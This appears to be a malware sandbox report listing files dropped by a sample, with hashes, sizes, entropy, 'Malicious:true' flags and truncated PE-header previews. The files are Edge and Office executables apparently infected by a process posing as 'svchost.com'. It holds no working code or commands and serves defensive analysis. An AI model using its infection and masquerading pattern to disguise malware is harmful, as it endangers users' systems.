                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):582184
                                      Entropy (8bit):6.398834596152969
                                      Encrypted:false
                                      SSDEEP:6144:Pu0LWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:PLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                      MD5:897450E53986279D2B04BA53B52BDDD8
                                      SHA1:94C242D856D91F902792EF4B390A65847321632F
                                      SHA-256:07648CB2CA34B1C0F75971AE97F941AB50AE25F76429AFD4CBF1895B0269D24E
                                      SHA-512:72A40CC08748BBAEE3E5B06EFA0F123F2C20A793B5862473EB972CA68F39474A89D4BF9DD0250321DC32D80AD8ADE6A0D52CCE978B5DC0AD1421E6213DA42C98
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3837992
                                      Entropy (8bit):6.444733046079261
                                      Encrypted:false
                                      SSDEEP:49152:BB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:NHzorVmr2FkRpdJYolA
                                      MD5:32890A1EABD25D9DAFC948F5146EE430
                                      SHA1:228A82E420134C823B26445D3124DEA5575E68B4
                                      SHA-256:3701476504BE77805D33A9E809A5D42C10170D5342C9D6DD2B546EB8D44F9005
                                      SHA-512:9B1B651AFB2C5DAFA5D3A0D48ADE18F90BC370F183C0884F21C1EC2454F015DEEFF627F091AD1C73341EEDD2F5C7D291DF2CAB0E6B23A8C5F52E2DE2DD3E0C6A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):161832
                                      Entropy (8bit):6.14756500825813
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCJ2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:PuYVSktVjv3Xg5T0FIY6
                                      MD5:04EF9F4C747D7E6688BA9F35B8E3D8BA
                                      SHA1:24E64BAC23BC510711460C2B33130FF4C1CDCE05
                                      SHA-256:3D1421240FCFD07D5084ED9D4B33A5DFFADE81CE7912EE0BE4A2E4437857B642
                                      SHA-512:BA8C839D6CA820B5DA5E1864564355EDB1628811B34FDFAAF54C0505D2971892C6CE3783FF4F2DA8BEC0A346BE733570BF50CD86B2726249AAF3DA611470B993
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1827880
                                      Entropy (8bit):6.540156971587151
                                      Encrypted:false
                                      SSDEEP:24576:nhDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:nhDdVrQ95RW0Y9HyWQXE/09Val0GE
                                      MD5:879742EC86106257BEA934DBE9B820B4
                                      SHA1:2D0D374FE06464FE3DEF4C6025BF2C5246572C03
                                      SHA-256:8AFF66C49C009D187109D8B38F826731B88C832B976767C41F73EA4C7972CF2C
                                      SHA-512:B7DD56A683CFB81DE96408F4D973EF9EB8201E5A2C574954487E152945D87CBCD5CF81D9567B09378E7737FA47B31AB29DCD03BE846DABAF164E3530639FCE36
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1297448
                                      Entropy (8bit):6.513926743108373
                                      Encrypted:false
                                      SSDEEP:12288:3doA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:370E0ZCQZMip6Rrt9RoctGfmdd0
                                      MD5:C46EECCF6FAE76F11358D0E43965681C
                                      SHA1:9ED2788370B6F5B476C7E6000058BE7D5EBEDA6E
                                      SHA-256:5804894F3F60DA262589131E6B7A1CEA7D5B1023993ABBAD2253C12526914D8E
                                      SHA-512:C36F36F16CFE7AA0A39353F45931B3B64D7E1168C8DCF61FB7A116612CB24A54E281D4D616EC21D6117118B03A0F03AEF8EFD91CFD5483EB6B6776C7A50EFED9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4251688
                                      Entropy (8bit):6.506317829104403
                                      Encrypted:false
                                      SSDEEP:49152:bpawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:QehFLvTQDpB5oSOmlBl
                                      MD5:6D080AAFAA8CE83776195B5B124103FF
                                      SHA1:8C8809935FA73EB7A18FBD8023B0636765DA9C09
                                      SHA-256:6AF714C0C52FE584E9B4E9EF39D4DE723C509BF9082476BA3C5B97DCB2D3E4F3
                                      SHA-512:F7C81889032AFFD9BF288A4B34ECD026B9EC6E5BF74D3D4EFF229029D63B33B26CD0B178AD95FD6BE728414882678F8E36C0C1373D21A32367E9508CCCE7EB25
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1319976
                                      Entropy (8bit):6.503786677710061
                                      Encrypted:false
                                      SSDEEP:12288:Uyeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:UiD2VmA1YXQHwlklb8boUuWPg2gX
                                      MD5:9CF33C2C22730E0C3C7F65154ABFD0A7
                                      SHA1:7ED4EB14D0A8174B75E4C5F0B06B4DB54F53429F
                                      SHA-256:FA5E80F107D15EA38675A3A544DA56AA245DB5421D64A162ECB4C159A6CBE229
                                      SHA-512:CD21A5AB79A0DDCE0F88C57D3E8E4B56C093B12E6CD74DF3AA234D1EB2C8C1D7E4412083836D102B5E4BB545177EC58D5E8FC21216DAB8AEC92D0D3F02026FAC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2327080
                                      Entropy (8bit):6.530984368082779
                                      Encrypted:false
                                      SSDEEP:24576:yfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:yfD3zO9ZhBGlopzM3HRNr00z
                                      MD5:3332CF2E4E55A3382BC000AD04399C84
                                      SHA1:88E1C5B851AB8F57E50EE2F9AFEDF3CE828FA19E
                                      SHA-256:780A8D096F70BC6FDEEEF05A22C1C943E64C2A3CBE33C6F3600504606D4FCBBB
                                      SHA-512:1CE56E69DB2CA020CCCC036B5F0FC93156F2352420B5F7E3F551230D478AF5470657F81617B45CB32DF98EF9DCBF5254BEB16DC75F43186ECFF2D71740A772B4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3790800
                                      Entropy (8bit):6.537629939786787
                                      Encrypted:false
                                      SSDEEP:49152:GTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:ZI72LvkrCpbxJRoIMx
                                      MD5:391A248273BFC2C0361AE5DFE61F6D1B
                                      SHA1:0BD38C25FE4CC60BCB67ABC8E7407F0135E61FD1
                                      SHA-256:AEF2E2B2AE1722A9D53DF0A40DD3B126AE40DEBB5176C150DA67AA72392AD6DE
                                      SHA-512:B5F345FE14835806C1273DFC6C9C1E993D9EF469E8D146BB466816748A8F432362734B72D9BB79848C2C50AE103273FF723E865C649A53D6D1130A8DEB2003DA
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1535528
                                      Entropy (8bit):6.517119310826715
                                      Encrypted:false
                                      SSDEEP:12288:+406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:HW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                      MD5:20628DE11335D9E9C180E82B8DA8C6F4
                                      SHA1:3214ED9228E71E72D86A3F9ECFB0F3B7A8AEAE8B
                                      SHA-256:1A1CC93F0239D3A342B27EF97020EF7DCC522BE9A8EEC0220C52B69E098EACCD
                                      SHA-512:138B4E13BFDC8ED20854432609FFC90852DF667507D7C0DA77D4F817A32A55D084CEEA30184D9DE444DA5A949665532F021E01BF30D261803DBF31E18BA6A8FE
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273384
                                      Entropy (8bit):6.515185633103735
                                      Encrypted:false
                                      SSDEEP:12288:u5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:uwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                      MD5:DA3D6D82C0A5DAB32AD539A41B2292C9
                                      SHA1:69A16AE6620EBC4E3AB589A77C3875332CD9EFDD
                                      SHA-256:B68881B7F63772E7D7002EF6ADFE43870760808167260F1FE2578808F47F67ED
                                      SHA-512:E75F6C20E0BE447C014874769E9037946DFBD602602AE6A1D5D197504FF5F13D5C6FABA3A93E0658E8B70A66B37790D500DF03D8FA6CA01A21FB08F461F1E74E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4251688
                                      Entropy (8bit):6.506317829104403
                                      Encrypted:false
                                      SSDEEP:49152:bpawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:QehFLvTQDpB5oSOmlBl
                                      MD5:6D080AAFAA8CE83776195B5B124103FF
                                      SHA1:8C8809935FA73EB7A18FBD8023B0636765DA9C09
                                      SHA-256:6AF714C0C52FE584E9B4E9EF39D4DE723C509BF9082476BA3C5B97DCB2D3E4F3
                                      SHA-512:F7C81889032AFFD9BF288A4B34ECD026B9EC6E5BF74D3D4EFF229029D63B33B26CD0B178AD95FD6BE728414882678F8E36C0C1373D21A32367E9508CCCE7EB25
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1319976
                                      Entropy (8bit):6.503786677710061
                                      Encrypted:false
                                      SSDEEP:12288:Uyeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:UiD2VmA1YXQHwlklb8boUuWPg2gX
                                      MD5:9CF33C2C22730E0C3C7F65154ABFD0A7
                                      SHA1:7ED4EB14D0A8174B75E4C5F0B06B4DB54F53429F
                                      SHA-256:FA5E80F107D15EA38675A3A544DA56AA245DB5421D64A162ECB4C159A6CBE229
                                      SHA-512:CD21A5AB79A0DDCE0F88C57D3E8E4B56C093B12E6CD74DF3AA234D1EB2C8C1D7E4412083836D102B5E4BB545177EC58D5E8FC21216DAB8AEC92D0D3F02026FAC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273384
                                      Entropy (8bit):6.515185633103735
                                      Encrypted:false
                                      SSDEEP:12288:u5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:uwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                      MD5:DA3D6D82C0A5DAB32AD539A41B2292C9
                                      SHA1:69A16AE6620EBC4E3AB589A77C3875332CD9EFDD
                                      SHA-256:B68881B7F63772E7D7002EF6ADFE43870760808167260F1FE2578808F47F67ED
                                      SHA-512:E75F6C20E0BE447C014874769E9037946DFBD602602AE6A1D5D197504FF5F13D5C6FABA3A93E0658E8B70A66B37790D500DF03D8FA6CA01A21FB08F461F1E74E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):225232
                                      Entropy (8bit):5.9169842072110015
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCFcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:PuFcwVz4B8c37KoNX1q
                                      MD5:B50DDBDB05BF0BB57476EA6C5A032B2D
                                      SHA1:75D97A80167D3AB18ECA1B1A990B894F691584B2
                                      SHA-256:5074A5357D42806C87926B169CD558E653349DF7E44354EC85460C0A2C95C50B
                                      SHA-512:FA6DBD13E3E85C5098B6A866E7F399AECDCD4FDD53ED3F60F9EE20F8ABC156F2F272B155B5BCD79F4424E89C8045094560575CBA622327D6661A4947D7D35D46
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):247760
                                      Entropy (8bit):5.766587112108476
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCQW4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcf:Puml/DRfkTC3dM7B+mCivAT
                                      MD5:886E05881670C2B29D17DF6823B38A66
                                      SHA1:4CB79B5F1DA8FE8079518B65FFFDB99EB0A3D76F
                                      SHA-256:AEEB4BAAD144DB01611C82FA0D8F0029F3EF777101740829E7F6D8D453E31D6D
                                      SHA-512:9FFF6FA38B694ABC945F515A78CFA793D6AB8E7977A2973A5B69265A965DFC76C6A77D48366D5A98EB4D4460A878BE02C95C828066E42FB3F4F64CCD30D93987
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142288
                                      Entropy (8bit):6.418539700023223
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCs684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:PuQrTB+AleYIkifYUF
                                      MD5:3856508A91D399E375B350B0C1423FFD
                                      SHA1:9747673D2FAF4EC499A05B3DFB80431029C17507
                                      SHA-256:B7E5B278ECB57EDBF3C121517B5CBE0B37C29D7A1F9BE1E121776C59B39F3E37
                                      SHA-512:77037E2A7F8A466D85F3A5CD2C19DA8D9795297BACA6477D8B39C29D7CBAE8641D6CE300F59035A674F749002B79199211C2955936AEB4DA0C7C6CDAB8636A1D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):259024
                                      Entropy (8bit):6.086004749509324
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCTXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:PuTUVwleMITTmNv1ohWsqYI354I
                                      MD5:C37E3B17146D3DF38E578862AEA8C6AC
                                      SHA1:4587242D000A11BF98779F074BB15989A9E57AC2
                                      SHA-256:FE9F873C55826F1C1CA88289966923B9B6FB330C2B46261B682584711B0A35D8
                                      SHA-512:D28917D093AF944094FF56D5712CC0AC9BBCE3337A524E9B95487510CF5ACD2608EA7914CCA920CA9BE5AA7F6CA808B920AEE6D596ECD74DB3B2551BC77047D2
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):305120
                                      Entropy (8bit):6.411066493542914
                                      Encrypted:false
                                      SSDEEP:6144:PumFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:vKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                      MD5:A44E4ED52DB101B90FC40FBD77EE5813
                                      SHA1:E1EA013D66084E842EE75CDF1A20F2C5C7C1D920
                                      SHA-256:A107A456D15142E351FA622010D0F75EDD8E331C147DF974A5EF1D8889700749
                                      SHA-512:30EBA6D8ECA2E67D40DA256558E758EE5A457E40E2D4A1CA1FFA175E063B6983F23210E35F7BA857E0F87A550511C8C5AE7F748D90B37F847432DC60B6916C0F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142288
                                      Entropy (8bit):6.419211340608754
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCDaivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:PujzB+Aw4CZNr2fYLl
                                      MD5:66668951BA49BF63140B9DC5384B12FF
                                      SHA1:864CF0FC89B1EC2FC0F7F86231001C606D95C626
                                      SHA-256:316FB2C43692DD48BF49D92F62393E1FEF23A024776398E25B5B08F2CB7601F0
                                      SHA-512:523138612680231D11AAC37F70C649334D8070D263DFA87A6DE9863C5C0A4E0AD6805F02EA29ABB99645CF55A3312B9101C0B06935F416BA5F33BFD8BC42E930
                                      Malicious:true
